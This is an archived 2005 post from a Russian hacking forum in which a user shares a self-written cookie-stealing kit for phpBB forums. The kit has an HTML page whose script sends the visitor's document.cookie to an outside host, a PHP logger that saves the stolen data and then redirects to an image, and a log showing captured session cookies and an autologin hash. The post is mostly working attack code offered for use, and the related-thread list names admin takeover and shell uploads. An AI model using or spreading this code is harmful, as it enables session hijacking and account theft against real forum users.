ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #3  
Старый 23.06.2005, 21:56
exbbxak
Новичок
Регистрация: 22.04.2005
Сообщений: 15
Провел на форуме:
9155

Репутация: 0
По умолчанию

просто свой скрипт написал на основе античатовского
код в картинке
<html>
<head>
<script>img = new Image(); img.src = "http://xxxx/1.php?lol"+document.cookie;
</script>
</head>
<body>
<img src="http:/xxxx/vl.jpg"><br>
</body>
</html>


Цитата:
<?php
$logfile="logi.txt"; #путь к лог-файлу
$mlength=50; #максимальное число записей в лог-файле

#читаем CGI запрос
$input = '';
foreach($HTTP_GET_VARS as $var => $val)
$input .= $var.'='.$val.' ';


#получаем время запроса и HTTP_REFERER
$now = time();
if (isset($HTTP_REFERER)) $ref = $_SERVER['HTTP_REFERER']; else $ref = 'No referrer!';

#читаем лог-файл в массив
$f = array();
$fh = @FOpen($logfile,'r');
if ($fh != false) {
while(!FEoF($fh))
$f[] = FGetS($fh);
FClose($fh);
}

#открываем на запись лог
$fh = FOPen($logfile,'w');

#сохраняем данные запроса
FPutS($fh,'['.$now.'] IP='.$REMOTE_ADDR.' REFERER='.$ref.' QUERY='.$input."
");

#сохраняем остальные логи, так что бы длина лог-файла не превышала mlength
$counter=0;
foreach ($f as $str) {
$counter++;
if ($counter < $mlength)
FPutS($fh,$str);
else
break;
};

#закрываем лог
Fclose ($fh);

#делаем редирект на картинку
header("Location: http://xxxxxx");

?>

после получения вашик Cookies а именно
Цитата:
[1119518613] IP=195.209.67.79 REFERER=http://xxxxxx.ru/images/avatars/150670992342b937671260b.jpg QUERY=xxxxxphpbb2mysql_data=a:2:{s\"autologinid\"; s\"5eb6c57b9b11a8c22ff02fa965bd9528\";s:6:\"userid \";i:3;}; phpbb2mysql_sid=816eeef16b5695e96aa113e3a6e964de; phpbb2mysql_t=a:3:{i:3958;i:1119518475;i:3856;i:11 19518507;i:3922;i:1119518518;}

Последний раз редактировалось exbbxak; 23.06.2005 в 22:01..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
химия своими руками silveran Болталка 43 11.01.2006 22:05
Что можно сделать в форуме Ipb 2.0.3. Имея пароль администратора? MDD Форумы 5 09.06.2005 11:59
Что можно сделать на форуме phpBB 2.0.13, если html разрешён? temon Форумы 3 02.05.2005 19:17
Можно ли залить шелл, зная пароль и ник админа на форуме? (phpbb 2.0.5) Evgeny Форумы 2 26.01.2005 07:34
В форуме ВВ-теги включены, но фильтруються "javascript, onclick.." Что можно сделать? Форумы 3 16.09.2004 01:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ